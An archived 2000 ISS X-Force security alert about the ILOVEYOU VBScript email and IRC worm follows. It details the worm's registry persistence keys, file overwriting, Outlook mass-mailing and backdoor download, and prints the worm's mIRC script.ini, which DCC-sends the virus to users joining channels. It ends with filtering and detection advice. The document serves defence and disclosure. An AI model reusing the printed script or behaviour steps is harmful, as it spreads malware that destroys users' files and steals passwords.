what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Internet Security Systems Security Alert May 4, 2000

Internet Security Systems Security Alert May 4, 2000
Posted May 5, 2000
Site xforce.iss.net

A dangerous Visual Basic Script (VBScript) virus, dubbed the LoveLetter or ILOVEYOU virus, has been spreading itself across the Internet through email via Microsoft Outlook and through Internet Relay Chat (IRC) using a popular IRC client named mIRC. The virus is susceptible to activation whenever the Windows Script Host features are enabled.

tags | virus
systems | windows
SHA-256 | fba2c99bda6968dbb189d98fd36cb2615406aa0d8be416faaf4a6c7b36fb06cc

Internet Security Systems Security Alert May 4, 2000

Change Mirror Download

TO UNSUBSCRIBE: email "unsubscribe alert" in the body of your message to
majordomo@iss.net Contact alert-owner@iss.net for help with any problems!
---------------------------------------------------------------------------

-----BEGIN PGP SIGNED MESSAGE-----

Internet Security Systems Security Alert
May 4, 2000

"ILOVEYOU" Virus Affects Windows Users

Synopsis:

A dangerous Visual Basic Script (VBScript) virus, dubbed the "LoveLetter" or
"ILOVEYOU" virus, has been spreading itself across the Internet through email
via Microsoft Outlook and through Internet Relay Chat (IRC) using a popular
IRC client named mIRC. The virus is susceptible to activation whenever the
Windows Script Host features are enabled.

Impact:

Mail servers may incur mild to severe overloading and could crash when flooded
with an unexpected number of the ILOVEYOU messages. The actual VBScript code
performs a number of destructive tasks:
- - modifies and creates various Windows registry entries
- - launches Internet Explorer to download a backdoor program which, once
installed, captures network passwords and emails this data to an account in
the Philippines
- - infects the local machine by creating many new copies of itself and
overwriting data files of specific file types (including VBScript,
JavaScript, JPEG, and MP2/MP3)
- - spreads itself to other users by using information from the Microsoft
Outlook Address Book, as well as mIRC's DCC feature, which allows chat
participants to exchange files

Description:

Visual Basic Scripts can be executed if Windows Script Host (WSH) is installed
and enabled. Windows Script Host is installed by default with Windows 98 and
with Internet Explorer version 4.0 and later.

The message is very identifiable. The subject is always "ILOVEYOU", and the
body of the email only contains the message "kindly check the attached
LOVELETTER coming from me." The email contains a single instance of the virus
in the form of an attachment named "LOVE-LETTER-FOR-YOU.TXT.vbs".

When the attachment is opened, the malicious VBScript code launches,
performing the following operations in sequence:

- - The virus removes the timeout associated with the Windows scripting unit by
changing the value of the HKEY_CURRENT_USER\Software\Microsoft\Windows
Scripting Host\Settings\Timeout registry key.

- - The virus copies itself to SYSTEMDIR\MSKernel32.vbs, WINDIR\Win32DLL.vbs,
and SYSTEMDIR\LOVE-LETTER-FOR-YOU.TXT.vbs.

- - The following registry entries are created under HKEY_LOCAL_MACHINE, such
that the MSKernel32.vbs and Win32DLL.vbs copies will be launched at
boot-time:

\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL

Win32DLL.vbs is created as a service.

- - An HTML file named LOVE-LETTER-FOR-YOU.HTM is created for later use (in the
mIRC script) and placed in the Windows SYSTEMDIR. Typically, WINDIR is
C:\WINDOWS and SYSTEMDIR is C:\WINDOWS\SYSTEM.

- - The virus attempts to spread itself via e-mail using Microsoft Outlook. It
sends a message to all addresses found in every address book. Each
individual is flagged in the registry after they have been sent a copy.

For each address list that is found, a counter is kept in the registry to
track the number of users that have been mailed. The number of email addresses
in the address list is also recorded. If the number of addresses in the list
increases, the virus will enumerate the individuals again and send out the
"ILOVEYOU" mail to those who have not previously received it.

All flags are kept in HKEY_CURRENT_USER\Software\Microsoft\WAB.

- - The virus uses Internet Explorer to connect one of four HTTP web locations
in an attempt to download a backdoor program called WIN-BUGSFIX.EXE. This
backdoor program captures any network passwords it identifies and
automatically emails this information to a mail account in the Philippines,
presumably controlled by the author of the virus.

Before Internet Explorer is launched, the following registry entry, which sets
the Internet Explorer start page, is changed to one of four URLs at random:

\Software\Microsoft\Internet Explorer\Main\Start Page

After the executable is downloaded, the start page value is set to
"about:blank".

- - The following registry entry is created (under HKEY_LOCAL_MACHINE) to launch
WIN-BUGSFIX.EXE at boot-time:

\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX.EXE

- - The virus identifies any "Fixed" or "Removable" drives connected to the
system and recursively visits each folder, overwriting files of any of the
following extensions with a copy of itself, changing the extension to ".vbs"
and deleting the original file:

vbs - Visual Basic Script
vbe - Visual Basic Script (Encoded)
js - JavaScript
jse - JavaScript (Encoded)
css - Cascading Style Sheets
wsh - Windows Script Host
sct - Scriptlet file
hta - HTML Application

The virus deletes any .jpg and .jpeg compressed image files, and replaces by a
copy of the virus with ".vbs" appended to the end of the original file name.

Original copies of any MP3 or MP2 audio files found are preserved, but a copy
of the virus is created using the same file name with ".vbs" appended. The
original MP2/MP3 file's attributes will be changed so the file is hidden.

- - If any of the files "mirc32.exe", "mlink32.exe", "mirc.ini", "script.ini",
or "mirc.hlp" are found, a new default initialization script named
"script.ini" is created in the same directory:

[script]
;mIRC Script
; Please dont edit this script... mIRC will corrupt, if mIRC will
; corrupt... WINDOWS will affect and will not run correctly. thanks
;
;Khaled Mardam-Bey
;https://www.mirc.com
;
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick &dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
n3=}

This script will attempt to send a copy of the pre-generated HTML page to any
user who is seen joining any channel you are in on IRC.

Recommendations:

Everyone should obtain and install the latest virus definition files for their
virus scanning software. Mail administrators should filter out any email that
has a .VBS attachment, or at least any mail with a subject line of
"ILOVEYOU".

ISS RealSecure can be configured to detect the ILOVEYOU virus by creating a
new User Defined Event. Set the priority to HIGH, and the context to
Email_Content. Set the search string to "kindly check the attached LOVELETTER
coming from me". Select the actions to RSKILL, and any additional action you
would like. This should stop any incoming email containing the virus from
being delivered to an SMTP server.

Trend Micro's instructions for removing the virus from your system can be
found at
https://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_LOVELETTER.

Additional Information:

For more information on the ILOVEYOU virus, visit the following web sites:

https://europe.datafellows.com/v-descs/love.htm
https://vil.mcafee.com/dispVirus.asp?virus_k=98617
https://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_LOVELETTER

_______


About Internet Security Systems (ISS)

Internet Security Systems (ISS) is a leading global provider of security
management solutions for the Internet. By providing industry-leading SAFEsuite
security software, remote managed security services, and strategic consulting
and education offerings, ISS is a trusted security provider to its customers,
protecting digital assets and ensuring safe and uninterrupted e-business. ISS'
security management solutions protect more than 5,500 customers worldwide
including 21 of the 25 largest U.S. commercial banks, 10 of the largest
telecommunications companies and over 35 government agencies. Founded in 1994,
ISS is headquartered in Atlanta, GA, with additional offices throughout North
America and international operations in Asia, Australia, Europe, Latin America
and the Middle East. For more information, visit the Internet Security Systems
web site at www.iss.net or call 888-901-7477.

Copyright (c) 2000 by Internet Security Systems, Inc.

Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express consent of
the X-Force. If you wish to reprint the whole or any part of this Alert in any
other medium excluding electronic medium, please e-mail xforce@iss.net for
permission.

Disclaimer

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no event shall the author be
liable for any damages whatsoever arising out of or in connection with the use
or spread of this information. Any use of this information is at the user's
own risk.

X-Force PGP Key available at: <A
HREF="https://xforce.iss.net/sensitive.php3">https://xforce.iss.net/sensitive.php3</A>
as well as on MIT's PGP key server and PGP.com's key server.

Please send suggestions, updates, and comments to: X-Force xforce@iss.net of
Internet Security Systems, Inc.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv

iQCVAwUBORICGjRfJiV99eG9AQGimAQAoGWXxsq3j1A3/12dHqh24rx+1NvM018t
lyP+l4nhWbrBN6sIsB5oTtenuWOtlXVewOnfrts9LuhkS5FRK3UcUU9pyuejC7TW
4i1RtFCHOFyJmbbsYKgHYrLIsZGblfVGWDCtyXYbAMoLcyOxPSPSzzwaH4t+Xx+i
otjmEIV8wno=
=9Ahv
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close